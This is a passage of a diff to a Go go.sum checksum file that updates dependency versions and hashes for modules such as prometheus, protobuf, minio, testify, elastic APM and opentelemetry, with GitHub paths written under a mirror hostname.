h1:jdQByPbusPIv2/zmleS9BjJVeZ6kBagPoEUsqbVz/1A= github.com/go-logr/logr v1.3.0/go.mod h1:9T104GzyrTigFIr8wt5mBrctHMim0Nb2HLGrmQ40KvY= +github.com/go-logr/logr v1.4.1 h1:pKouT5E8xu9zeFC39JXRDukb6JFQPXM5p5I91188VAQ= +github.com/go-logr/logr v1.4.1/go.mod h1:9T104GzyrTigFIr8wt5mBrctHMim0Nb2HLGrmQ40KvY= +github.com/go-logr/stdr v1.2.2 h1:hSWxHoqTgW2S2qGc0LTAI563KZ5YKYRhT3MFKZMbjag= +github.com/go-logr/stdr v1.2.2/go.mod h1:mMo/vtBO5dYbehREoey6XUKy/eSumjCCveDpRre4VKE= github.com/go-ole/go-ole v1.2.6 h1:/Fpf6oFPoeFik9ty7siob0G6Ke8QvQEuVcuChpwXzpY= github.com/go-ole/go-ole v1.2.6/go.mod h1:pprOEPIfldk/42T2oK7lQ4v4JSDwmV0As9GaiUsvbm0= github.com/go-openapi/errors v0.20.2/go.mod h1:cM//ZKUKyO06HSwqAelJ5NsEMMcpa6VpXe8DOa1Mi1M= @@ -165,7 +168,6 @@ github.com/golang/groupcache v0.0.0-20210331224755-41bb18bfe9da h1:oI5xCqsCo564l github.com/golang/groupcache v0.0.0-20210331224755-41bb18bfe9da/go.mod h1:cIg4eruTrX1D+g88fzRXU5OdNfaM+9IcxsU14FzY7Hc= github.com/golang/mock v1.1.1/go.mod h1:oTYuIxOrZwtPieC+H1uAHpcLFnEyAGVDL/k47Jfbm0A= github.com/golang/protobuf v1.2.0/go.mod h1:6lQm79b+lXiMfvg/cZm0SGofjICqVBUtrP5yJMmIC1U= -github.com/golang/protobuf v1.3.1/go.mod h1:6lQm79b+lXiMfvg/cZm0SGofjICqVBUtrP5yJMmIC1U= github.com/golang/protobuf v1.3.2/go.mod h1:6lQm79b+lXiMfvg/cZm0SGofjICqVBUtrP5yJMmIC1U= github.com/golang/protobuf v1.4.0-rc.1/go.mod h1:ceaxUfeHdC40wWswd/P6IGgMaK3YpKi5j83Wpe3EHw8= github.com/golang/protobuf v1.4.0-rc.1.0.20200221234624-67d41d38c208/go.mod h1:xKAWHe0F5eneWXFV3EuXVDTCmh+JuBKY0li0aMyXATA= @@ -175,8 +177,9 @@ github.com/golang/protobuf v1.4.0/go.mod h1:jodUvKwWbYaEsadDk5Fwe5c77LiNKVO9IDvq github.com/golang/protobuf v1.4.1/go.mod h1:U8fpvMrcmy5pZrNK1lt4xCsGvpyWQ/VVv6QDs8UjoX8= github.com/golang/protobuf v1.4.3/go.mod h1:oDoupMAO8OvCJWAcko0GGGIgR6R6ocIYbsSw735rRwI= github.com/golang/protobuf v1.5.0/go.mod h1:FsONVRAS9T7sI+LIUmWTfcYkHO4aIWwzhcaSAoJOfIk= -github.com/golang/protobuf v1.5.3 h1:KhyjKVUg7Usr/dYsdSqoFveMYd5ko72D+zANwlG1mmg= -github.com/golang/protobuf v1.5.3/go.mod h1:XVQd3VNwM+JqD3oG2Ue2ip4fOMUkwXdXDdiuN0vRsmY= +github.com/golang/protobuf v1.5.2/go.mod h1:XVQd3VNwM+JqD3oG2Ue2ip4fOMUkwXdXDdiuN0vRsmY= +github.com/golang/protobuf v1.5.4 h1:i7eJL8qZTpSEXOPTxNKhASYpMn+8e5Q6AdndVa1dWek= +github.com/golang/protobuf v1.5.4/go.mod h1:lnTiLA8Wa4RWRcIUkrtSVa5nRhsEGBg48fD6rSs7xps= github.com/golang/snappy v0.0.1/go.mod h1:/XxbfmMg8lxefKM7IXC3fBNl/7bRcc72aCRzEWrmP2Q= github.com/golang/snappy v0.0.2/go.mod h1:/XxbfmMg8lxefKM7IXC3fBNl/7bRcc72aCRzEWrmP2Q= github.com/golang/snappy v0.0.4 h1:yAGX7huGHXlcLOEtBnF4w7FQwA26wojNCwOYAEhLjQM= @@ -223,10 +226,10 @@ github.com/google/uuid v1.6.0 h1:NIvaJDMOsjHA8n1jAhLSgzrAzy1Hgr+hNrb57e+94F0= github.com/google/uuid v1.6.0/go.mod h1:TIyPZe4MgqvfeYDBFedMoGGpEw/LqOeaOT+nhxU+yHo= github.com/googleapis/enterprise-certificate-proxy v0.3.2 h1:Vie5ybvEvT75RniqhfFxPRy3Bf7vr3h0cechB90XaQs= github.com/googleapis/enterprise-certificate-proxy v0.3.2/go.mod h1:VLSiSSBs/ksPL8kq3OBOQ6WRI2QnaFynd1DCjZ62+V0= -github.com/googleapis/gax-go/v2 v2.12.0 h1:A+gCJKdRfqXkr+BIRGtZLibNXf0m1f9E4HG56etFpas= -github.com/googleapis/gax-go/v2 v2.12.0/go.mod h1:y+aIqrI5eb1YGMVJfuV3185Ts/D7qKpsEkdD5+I6QGU= -github.com/gorilla/handlers v1.5.1 h1:9lRY6j8DEeeBT10CvO9hGW0gmky0BprnvDI5vfhUHH4= -github.com/gorilla/handlers v1.5.1/go.mod h1:t8XrUpc4KVXb7HGyJ4/cEnwQiaxrX/hz1Zv/4g96P1Q= +github.com/googleapis/gax-go/v2 v2.12.3 h1:5/zPPDvw8Q1SuXjrqrZslrqT7dL/uJT2CQii/cLCKqA= +github.com/googleapis/gax-go/v2 v2.12.3/go.mod h1:AKloxT6GtNbaLm8QTNSidHUVsHYcBHwWRvkNFJUQcS4= +github.com/gorilla/handlers v1.5.2 h1:cLTUSsNkgcwhgRqvCNmdbRWG0A3N4F+M2nWKdScwyEE= +github.com/gorilla/handlers v1.5.2/go.mod h1:dX+xVpaxdSw+q0Qek8SSsl3dfMk3jNddUkMzo0GtH0w= github.com/gorilla/mux v1.8.1 h1:TuBL49tXwgrFYWhqrNgrUNEY92u81SPhu7sTdzQEiWY= github.com/gorilla/mux v1.8.1/go.mod h1:AKf9I4AEqPTmMytcMc0KkNouC66V3BtZ4qD5fmWSiMQ= github.com/gorilla/websocket v1.4.2/go.mod h1:YR8l580nyteQvAITg2hZ9XVh4b55+EU/adAjf1fMHhE= @@ -272,12 +275,12 @@ github.com/kisielk/gotool v1.0.0/go.mod h1:XhKaO+MFFWcvkIS/tQcRk01m1F5IRFswLeQ+o github.com/klauspost/compress v1.4.1/go.mod h1:RyIbtBH6LamlWaDj8nUwkbUhJ87Yi3uG0guNDohfE1A= github.com/klauspost/compress v1.11.4/go.mod h1:aoV0uJVorq1K+umq18yTdKaF57EivdYsUV+/s2qKfXs= github.com/klauspost/compress v1.13.6/go.mod h1:/3/Vjq9QcHkK5uEr5lBEmyoZ1iFhe47etQ6QUkpK6sk= -github.com/klauspost/compress v1.17.0 h1:Rnbp4K9EjcDuVuHtd0dgA4qNuv9yKDYKK1ulpJwgrqM= -github.com/klauspost/compress v1.17.0/go.mod h1:ntbaceVETuRiXiv4DpjP66DpAtAGkEQskQzEyD//IeE= +github.com/klauspost/compress v1.17.6 h1:60eq2E/jlfwQXtvZEeBUYADs+BwKBWURIY+Gj2eRGjI= +github.com/klauspost/compress v1.17.6/go.mod h1:/dCuZOvVtNoHsyb+cuJD3itjs3NbnF6KH9zAO4BDxPM= github.com/klauspost/cpuid v1.2.0 h1:NMpwD2G9JSFOE1/TJjGSo5zG7Yb2bTe7eq1jH+irmeE= github.com/klauspost/cpuid v1.2.0/go.mod h1:Pj4uuM528wm8OyEC2QMXAi2YiTZ96dNQPGgoMS4s3ek= -github.com/klauspost/cpuid/v2 v2.2.5 h1:0E5MSMDEoAulmXNFquVs//DdoomxaoTY1kUhbc/qbZg= -github.com/klauspost/cpuid/v2 v2.2.5/go.mod h1:Lcz8mBdAVJIBVzewtcLocK12l3Y+JytZYpaMropDUws= +github.com/klauspost/cpuid/v2 v2.2.6 h1:ndNyv040zDGIDh8thGkXYjnFtiN02M1PVVF+JE/48xc= +github.com/klauspost/cpuid/v2 v2.2.6/go.mod h1:Lcz8mBdAVJIBVzewtcLocK12l3Y+JytZYpaMropDUws= github.com/klauspost/pgzip v1.2.5 h1:qnWYvvKqedOF2ulHpMG72XQol4ILEJ8k2wwRl/Km8oE= github.com/klauspost/pgzip v1.2.5/go.mod h1:Ch1tH69qFZu15pkjo5kYi6mth2Zzwzt50oCQKQE9RUs= github.com/kr/pretty v0.1.0/go.mod h1:dAy3ld7l9f0ibDNOQOHHMYYIIbhfbHSm3C4ZsoJORNo= @@ -308,8 +311,6 @@ github.com/mattn/go-isatty v0.0.20/go.mod h1:W+V8PltTTMOvKvAeJH7IuucS94S2C6jfK/D github.com/mattn/go-runewidth v0.0.9/go.mod h1:H031xJmbD/WCDINGzjvQ9THkh0rPKHF+m2gUSrubnMI= github.com/mattn/go-runewidth v0.0.14 h1:+xnbZSEeDbOIg5/mE6JF0w6n9duR1l3/WmbinWVwUuU= github.com/mattn/go-runewidth v0.0.14/go.mod h1:Jdepj2loyihRzMpdS35Xk/zdY8IAYHsh153qUoGf23w= -github.com/matttproud/golang_protobuf_extensions v1.0.4 h1:mmDVorXM7PCGKw94cs5zkfA9PSy5pEvNWRP0ET0TIVo= -github.com/matttproud/golang_protobuf_extensions v1.0.4/go.mod h1:BSXmuO+STAnVfrANrmjBb36TMTDstsz7MSK+HVaYKv4= github.com/mgutz/ansi v0.0.0-20170206155736-9520e82c474b/go.mod h1:01TrycV0kFyexm33Z7vhZRXopbI8J3TDReVlkTgMUxE= github.com/mgutz/ansi v0.0.0-20200706080929-d51e80ef957d h1:5PJl274Y63IEHC+7izoQE9x6ikvDFZS2mDVS3drnohI= github.com/mgutz/ansi v0.0.0-20200706080929-d51e80ef957d/go.mod h1:01TrycV0kFyexm33Z7vhZRXopbI8J3TDReVlkTgMUxE= @@ -317,8 +318,8 @@ github.com/mholt/archiver/v3 v3.5.1 h1:rDjOBX9JSF5BvoJGvjqK479aL70qh9DIpZCl+k7Cl github.com/mholt/archiver/v3 v3.5.1/go.mod h1:e3dqJ7H78uzsRSEACH1joayhuSyhnonssnDhppzS1L4= github.com/minio/md5-simd v1.1.2 h1:Gdi1DZK69+ZVMoNHRXJyNcxrMA4dSxoYHZSQbirFg34= github.com/minio/md5-simd v1.1.2/go.mod h1:MzdKDxYpY2BT9XQFocsiZf/NKVtR7nkE4RoEpN+20RM= -github.com/minio/minio-go/v7 v7.0.63 h1:GbZ2oCvaUdgT5640WJOpyDhhDxvknAJU2/T3yurwcbQ= -github.com/minio/minio-go/v7 v7.0.63/go.mod h1:Q6X7Qjb7WMhvG65qKf4gUgA5XaiSox74kR1uAEjxRS4= +github.com/minio/minio-go/v7 v7.0.69 h1:l8AnsQFyY1xiwa/DaQskY4NXSLA2yrGsW5iD9nRPVS0= +github.com/minio/minio-go/v7 v7.0.69/go.mod h1:XAvOPJQ5Xlzk5o3o/ArO2NMbhSGkimC+bpW/ngRKDmQ= github.com/minio/sha256-simd v1.0.1 h1:6kaan5IFmwTNynnKKpDHe6FWHohJOHhCPchzK49dzMM= github.com/minio/sha256-simd v1.0.1/go.mod h1:Pz6AKMiUdngCLpeTL/RJY1M9rUuPMYujV5xJjtbRSN8= github.com/mitchellh/copystructure v1.0.0/go.mod h1:SNtv71yrdKgLRyLFxmLdkAbkKEFWgYaq1OVrnRcwhnw= @@ -378,15 +379,15 @@ github.com/pmezard/go-difflib v1.0.1-0.20181226105442-5d4384ee4fb2 h1:Jamvg5psRI github.com/pmezard/go-difflib v1.0.1-0.20181226105442-5d4384ee4fb2/go.mod h1:iKH77koFhYxTK1pcRnkKkqfTogsbg7gZNVY4sRDYZ/4= github.com/power-devops/perfstat v0.0.0-20210106213030-5aafc221ea8c h1:ncq/mPwQF4JjgDlrVEn3C11VoGHZN7m8qihwgMEtzYw= github.com/power-devops/perfstat v0.0.0-20210106213030-5aafc221ea8c/go.mod h1:OmDBASR4679mdNQnz2pUhc2G8CO2JrUAVFDRBDP/hJE= -github.com/prometheus/client_golang v1.17.0 h1:rl2sfwZMtSthVU752MqfjQozy7blglC+1SOtjMAMh+Q= -github.com/prometheus/client_golang v1.17.0/go.mod h1:VeL+gMmOAxkS2IqfCq0ZmHSL+LjWfWDUmp1mBz9JgUY= +github.com/prometheus/client_golang v1.19.0 h1:ygXvpU1AoN1MhdzckN+PyD9QJOSD4x7kmXYlnfbA6JU= +github.com/prometheus/client_golang v1.19.0/go.mod h1:ZRM9uEAypZakd+q/x7+gmsvXdURP+DABIEIjnmDdp+k= github.com/prometheus/client_model v0.0.0-20190812154241-14fe0d1b01d4/go.mod h1:xMI15A0UPsDsEKsMN9yxemIoYk6Tm2C1GtYGdfGttqA= -github.com/prometheus/client_model v0.4.1-0.20230718164431-9a2bf3000d16 h1:v7DLqVdK4VrYkVD5diGdl4sxJurKJEMnODWRJlxV9oM= -github.com/prometheus/client_model v0.4.1-0.20230718164431-9a2bf3000d16/go.mod h1:oMQmHW1/JoDwqLtg57MGgP/Fb1CJEYF2imWWhWtMkYU= -github.com/prometheus/common v0.44.0 h1:+5BrQJwiBB9xsMygAB3TNvpQKOwlkc25LbISbrdOOfY= -github.com/prometheus/common v0.44.0/go.mod h1:ofAIvZbQ1e/nugmZGz4/qCb9Ap1VoSTIO7x0VV9VvuY= -github.com/prometheus/procfs v0.11.1 h1:xRC8Iq1yyca5ypa9n1EZnWZkt7dwcoRPQwX/5gwaUuI= -github.com/prometheus/procfs v0.11.1/go.mod h1:eesXgaPo1q7lBpVMoMy0ZOFTth9hBn4W/y0/p/ScXhY= +github.com/prometheus/client_model v0.5.0 h1:VQw1hfvPvk3Uv6Qf29VrPF32JB6rtbgI6cYPYQjL0Qw= +github.com/prometheus/client_model v0.5.0/go.mod h1:dTiFglRmd66nLR9Pv9f0mZi7B7fk5Pm3gvsjB5tr+kI= +github.com/prometheus/common v0.48.0 h1:QO8U2CdOzSn1BBsmXJXduaaW+dY/5QLjfB8svtSzKKE= +github.com/prometheus/common v0.48.0/go.mod h1:0/KsvlIEfPQCQ5I2iNSAWKPZziNCvRs5EC6ILDTlAPc= +github.com/prometheus/procfs v0.12.0 h1:jluTpSng7V9hY0O2R9DzzJHYb2xULk9VTR1V1R/k6Bo= +github.com/prometheus/procfs v0.12.0/go.mod h1:pcuDEFsWDnvcgNzo4EEweacyhjeA9Zk3cnaOZAZEfOo= github.com/rivo/uniseg v0.2.0/go.mod h1:J6wj4VEh+S6ZtnVlnTBMWIodfgj8LQOQFoIToxlJtxc= github.com/rivo/uniseg v0.4.3 h1:utMvzDsuh3suAEnhH0RdHmoPbU648o6CvXxTx4SBMOw= github.com/rivo/uniseg v0.4.3/go.mod h1:FN3SvrM+Zdj16jyLfmOkMNblXMcoc8DfTHruCPUcx88= @@ -398,8 +399,8 @@ github.com/russross/blackfriday/v2 v2.1.0 h1:JIOH55/0cWyOuilr9/qlrm0BSXldqnqwMsf github.com/russross/blackfriday/v2 v2.1.0/go.mod h1:+Rmxgy9KzJVeS9/2gXHxylqXiyQDYRxCVz55jmeOWTM= github.com/sergi/go-diff v1.2.0 h1:XU+rvMAioB0UC3q1MFrIQy4Vo5/4VsRDQQXHsEya6xQ= github.com/sergi/go-diff v1.2.0/go.mod h1:STckp+ISIX8hZLjrqAeVduY0gWCT9IjLuqbuNXdaHfM= -github.com/shirou/gopsutil/v3 v3.23.12 h1:z90NtUkp3bMtmICZKpC4+WaknU1eXtp5vtbQ11DgpE4= -github.com/shirou/gopsutil/v3 v3.23.12/go.mod h1:1FrWgea594Jp7qmjHUUPlJDTPgcsb9mGnXDxavtikzM= +github.com/shirou/gopsutil/v3 v3.24.2 h1:kcR0erMbLg5/3LcInpw0X/rrPSqq4CDPyI6A6ZRC18Y= +github.com/shirou/gopsutil/v3 v3.24.2/go.mod h1:tSg/594BcA+8UdQU2XcW803GWYgdtauFFPgJCJKZlVk= github.com/shoenig/go-m1cpu v0.1.6 h1:nxdKQNcEB6vzgA2E2bvzKIYRuNj7XNJ4S/aRSwKzFtM= github.com/shoenig/go-m1cpu v0.1.6/go.mod h1:1JJMcUBvfNwpq05QDQVAnx3gUHr9IYF7GNg9SUEw2VQ= github.com/shoenig/test v0.6.4 h1:kVTaSd7WLz5WZ2IaoM0RSzRsUD+m8wRR+5qvntpn4LU= @@ -407,13 +408,11 @@ github.com/shoenig/test v0.6.4/go.mod h1:byHiCGXqrVaflBLAMq/srcZIHynQPQgeyvkvXnj github.com/shopspring/decimal v1.2.0/go.mod h1:DKyhrW/HYNuLGql+MJL6WCR6knT2jwCFRcu2hWCYk4o= github.com/shopspring/decimal v1.3.1 h1:2Usl1nmF/WZucqkFZhnfFYxxxu8LG21F6nPQBE5gKV8= github.com/shopspring/decimal v1.3.1/go.mod h1:DKyhrW/HYNuLGql+MJL6WCR6knT2jwCFRcu2hWCYk4o= -github.com/sirupsen/logrus v1.9.3 h1:dueUQJ1C2q9oE3F7wvmSGAaVtTmUizReu6fjN8uqzbQ= -github.com/sirupsen/logrus v1.9.3/go.mod h1:naHLuLoDiP4jHNo9R0sCBMtWGeIprob74mVsIT4qYEQ= github.com/spf13/afero v1.11.0 h1:WJQKhtpdm3v2IzqG8VMqrr6Rf3UYpEF239Jy9wNepM8= github.com/spf13/afero v1.11.0/go.mod h1:GH9Y3pIexgf1MTIWtNGyogA5MwRIDXGUr+hbWNoBjkY= github.com/spf13/cast v1.3.1/go.mod h1:Qx5cxh0v+4UWYiBimWS+eyWzqEqokIECu5etghLkUJE= -github.com/spf13/cast v1.5.1 h1:R+kOtfhWQE6TVQzY+4D7wJLBgkdVasCEFxSUBYBYIlA= -github.com/spf13/cast v1.5.1/go.mod h1:b9PdjNptOpzXr7Rq1q9gJML/2cdGQAo69NKzQ10KN48= +github.com/spf13/cast v1.6.0 h1:GEiTHELF+vaR5dhz3VqZfFSzZjYbgeKDpBxQVS4GYJ0= +github.com/spf13/cast v1.6.0/go.mod h1:ancEpBxwJDODSW/UG4rDrAqiKolqNNh2DX3mk86cAdo= github.com/spf13/cobra v1.8.0 h1:7aJaZx1B85qltLMc546zn58BxxfZdR/W22ej9CFoEf0= github.com/spf13/cobra v1.8.0/go.mod h1:WXLWApfZ71AjXPya3WOlMsY9yMs7YeiHhFVlvLyhcho= github.com/spf13/pflag v1.0.5 h1:iy+VFUOCP1a+8yFto/drg2CJ5u0yRoB7fZw3DKv/JXA= @@ -421,8 +420,8 @@ github.com/spf13/pflag v1.0.5/go.mod h1:McXfInJRrz4CZXVZOBLb0bTZqETkiAhM9Iw0y3An github.com/stretchr/objx v0.1.0/go.mod h1:HFkY916IF+rwdDfMAkV7OtwuqBVzrE8GR6GFx+wExME= github.com/stretchr/objx v0.4.0/go.mod h1:YvHI0jy2hoMjB+UWwv71VJQ9isScKT/TqJzVSSt89Yw= github.com/stretchr/objx v0.5.0/go.mod h1:Yh+to48EsGEfYuaHDzXPcE3xhTkx73EhmCGUpEOglKo= -github.com/stretchr/objx v0.5.1 h1:4VhoImhV/Bm0ToFkXFi8hXNXwpDRZ/ynw3amt82mzq0= -github.com/stretchr/objx v0.5.1/go.mod h1:/iHQpkQwBD6DLUmQ4pE+s1TXdob1mORJ4/UFdrifcy0= +github.com/stretchr/objx v0.5.2 h1:xuMeJ0Sdp5ZMRXx/aWO6RZxdr3beISkG5/G/aIRr3pY= +github.com/stretchr/objx v0.5.2/go.mod h1:FRsXN1f5AsAjCGJKqEizvkpNtU+EGNCLh3NxZ/8L+MA= github.com/stretchr/testify v1.2.2/go.mod h1:a8OnRcib4nhh0OaRAV+Yts87kKdq0PP7pXfy6kDkUVs= github.com/stretchr/testify v1.3.0/go.mod h1:M5WIy9Dh21IEIfnGCwXGc5bZfKNJtfHm1UVUgZn+9EI= github.com/stretchr/testify v1.4.0/go.mod h1:j7eGeouHqKxXV5pUuKE4zz7dFj8WfuZ+81PSLYec5m4= @@ -432,9 +431,9 @@ github.com/stretchr/testify v1.7.0/go.mod h1:6Fq8oRcR53rry900zMqJjRRixrwX3KX962/ github.com/stretchr/testify v1.7.1/go.mod h1:6Fq8oRcR53rry900zMqJjRRixrwX3KX962/h/Wwjteg= github.com/stretchr/testify v1.8.0/go.mod h1:yNjHg4UonilssWZ8iaSj1OCr/vHnekPRkoO+kdMU+MU= github.com/stretchr/testify v1.8.1/go.mod h1:w2LPCIKwWwSfY2zedu0+kehJoqGctiVI29o6fzry7u4= -github.com/stretchr/testify v1.8.2/go.mod h1:w2LPCIKwWwSfY2zedu0+kehJoqGctiVI29o6fzry7u4= -github.com/stretchr/testify v1.8.4 h1:CcVxjf3Q8PM0mHUKJCdn+eZZtm5yQwehR5yeSVQQcUk= github.com/stretchr/testify v1.8.4/go.mod h1:sz/lmYIOXD/1dqDmKjjqLyZ2RngseejIcXlSw2iwfAo= +github.com/stretchr/testify v1.9.0 h1:HtqpIVDClZ4nwg75+f6Lvsy/wHu+3BoSGCbBAcpTsTg= +github.com/stretchr/testify v1.9.0/go.mod h1:r2ic/lqez/lEtzL7wO/rwa5dbSLXVDPFyf8C91i36aY= github.com/tidwall/pretty v1.0.0 h1:HsD+QiTn7sK6flMKIvNmpqz1qrpP3Ps6jOKIKMooyg4= github.com/tidwall/pretty v1.0.0/go.mod h1:XNkn88O1ChpSDQmQeStsy+sBenx6DDtFZJxhVysOjyk= github.com/tklauser/go-sysconf v0.3.12 h1:0QaGUFOdQaIVdPgfITYzaTegZvdCjmYO52cSFAEVmqU= @@ -463,16 +462,18 @@ github.com/yuin/goldmark v1.2.1/go.mod h1:3hX8gzYuyVAZsxl0MRgGTJEmQBFcNTphYh9dec github.com/yuin/goldmark v1.3.5/go.mod h1:mwnBkeHKe2W/ZEtQ+71ViKU8L12m81fl3OWwC1Zlc8k= github.com/yuin/goldmark v1.4.0/go.mod h1:mwnBkeHKe2W/ZEtQ+71ViKU8L12m81fl3OWwC1Zlc8k= github.com/yuin/goldmark v1.4.13/go.mod h1:6yULJ656Px+3vBD8DxQVa3kxgyrAnzto9xy5taEt/CY= -github.com/yusufpapurcu/wmi v1.2.3 h1:E1ctvB7uKFMOJw3fdOW32DwGE9I7t++CRUEMKvFoFiw= -github.com/yusufpapurcu/wmi v1.2.3/go.mod h1:SBZ9tNy3G9/m5Oi98Zks0QjeHVDvuK0qfxQmPyzfmi0= -go.elastic.co/apm/module/apmgorilla/v2 v2.4.7 h1:KKVofZksT6fQ6SRd78t5B2Q0s7NXcQ2na99yFZ++QLw= -go.elastic.co/apm/module/apmgorilla/v2 v2.4.7/go.mod h1:1f5MubV9IprFxjZ4Q+j/nUtomBNncE0pO43/fBkPcGo= -go.elastic.co/apm/module/apmhttp/v2 v2.4.7 h1:IL+DRK8ODO791ai/l1g/8dk6E3VPomiV0jbRIxBWbqM= -go.elastic.co/apm/module/apmhttp/v2 v2.4.7/go.mod h1:Itj4PGNVO33Tpp/9UPf4A6pCezTmADRRi/ytLAGms24= -go.elastic.co/apm/module/apmzap/v2 v2.4.7 h1:j96pvon+IhbFpzV4IflXwxOKD+l5rApyyN2ycarJG6Y= -go.elastic.co/apm/module/apmzap/v2 v2.4.7/go.mod h1:bi0A6hYYwModJI70LJDB8IHqw7291Ub16LRdEXNcOcU= -go.elastic.co/apm/v2 v2.4.7 h1:m5B2m59KgbiupuzFUkKqEvwHABIZxl2Ob0tCgc0XG9w= -go.elastic.co/apm/v2 v2.4.7/go.mod h1:+CiBUdrrAGnGCL9TNx7tQz3BrfYV23L8Ljvotoc87so= +github.com/yusufpapurcu/wmi v1.2.4 h1:zFUKzehAFReQwLys1b/iSMl+JQGSCSjtVqQn9bBrPo0= +github.com/yusufpapurcu/wmi v1.2.4/go.mod h1:SBZ9tNy3G9/m5Oi98Zks0QjeHVDvuK0qfxQmPyzfmi0= +go.einride.tech/aip v0.66.0 h1:XfV+NQX6L7EOYK11yoHHFtndeaWh3KbD9/cN/6iWEt8= +go.einride.tech/aip v0.66.0/go.mod h1:qAhMsfT7plxBX+Oy7Huol6YUvZ0ZzdUz26yZsQwfl1M= +go.elastic.co/apm/module/apmgorilla/v2 v2.5.0 h1:XeKkwqXWBEoU68AYPvFaOJYcs+c56S9sLV2wtRdwf3g= +go.elastic.co/apm/module/apmgorilla/v2 v2.5.0/go.mod h1:EORWcVUh8p3Z2d2GdoHMQs07fhkXRqV3lInehgMMnao= +go.elastic.co/apm/module/apmhttp/v2 v2.5.0 h1:4AWlw8giL7hRYBQiwF1/Thm0GDsbQH/Ofe4eySAnURo= +go.elastic.co/apm/module/apmhttp/v2 v2.5.0/go.mod h1:ZP7gLEzY/OAPTqNZjp8AzA06HF82zfwXEpKI2sSVTgk= +go.elastic.co/apm/module/apmzap/v2 v2.5.0 h1:COXqVte4i75XQmV+H4m4g+2JubK3Y1WRIzY/ppKa3bQ= +go.elastic.co/apm/module/apmzap/v2 v2.5.0/go.mod h1:PHKFbSROQPFZ2+X3oZyaF8lie5DhK0gtcRMpz//S54g= +go.elastic.co/apm/v2 v2.5.0 h1:UYqdu/bjcubcP9BIy5+os2ExRzw03yOQFG+sRGGhVlQ= +go.elastic.co/apm/v2 v2.5.0/go.mod h1:+CiBUdrrAGnGCL9TNx7tQz3BrfYV23L8Ljvotoc87so= go.elastic.co/ecszap v1.0.2 h1:iW5OGx8IiokiUzx/shD4AJCPFMC9uUtr7ycaiEIU++I= go.elastic.co/ecszap v1.0.2/go.mod h1:dJkSlK3BTiwG/qXhCwe50Mz/jwu854vSip8sIeQhNZg= go.elastic.co/fastjson v1.1.0 h1:3MrGBWWVIxe/xvsbpghtkFoPciPhOCmjsR/HfwEeQR4= @@ -482,18 +483,30 @@ go.mongodb.org/mongo-driver v1.11.1 h1:QP0znIRTuL0jf1oBQoAoM0C6ZJfBK4kx0Uumtv1A7 go.mongodb.org/mongo-driver v1.11.1/go.mod h1:s7p5vEtfbeR1gYi6pnj3c3/urpbLv2T5Sfd6Rp2HBB8= go.opencensus.io v0.24.0 h1:y73uSU6J157QMP2kn2r30vwW1A2W2WFwSCGnAVxeaD0= go.opencensus.io v0.24.0/go.mod h1:vNK8G9p7aAivkbmorf4v+7Hgx+Zs0yY+0fOtgBfjQKo= +go.opentelemetry.io/contrib/instrumentation/google.golang.org/grpc/otelgrpc v0.49.0 h1:4Pp6oUg3+e/6M4C0A/3kJ2VYa++dsWVTtGgLVj5xtHg= +go.opentelemetry.io/contrib/instrumentation/google.golang.org/grpc/otelgrpc v0.49.0/go.mod h1:Mjt1i1INqiaoZOMGR1RIUJN+i3ChKoFRqzrRQhlkbs0= +go.opentelemetry.io/contrib/instrumentation/net/http/otelhttp v0.49.0 h1:jq9TW8u3so/bN+JPT166wjOI6/vQPF6Xe7nMNIltagk= +go.opentelemetry.io/contrib/instrumentation/net/http/otelhttp v0.49.0/go.mod h1:p8pYQP+m5XfbZm9fxtSKAbM6oIllS7s2AfxrChvc7iw= +go.opentelemetry.io/otel v1.24.0 h1:0LAOdjNmQeSTzGBzduGe/rU4tZhMwL5rWgtp9Ku5Jfo= +go.opentelemetry.io/otel v1.24.0/go.mod h1:W7b9Ozg4nkF5tWI5zsXkaKKDjdVjpD4oAt9Qi/MArHo= +go.opentelemetry.io/otel/metric v1.24.0 h1:6EhoGWWK28x1fbpA4tYTOWBkPefTDQnb8WSGXlc88kI= +go.opentelemetry.io/otel/metric v1.24.0/go.mod h1:VYhLe1rFfxuTXLgj4CBiyz+9WYBA8pNGJgDcSFRKBco= 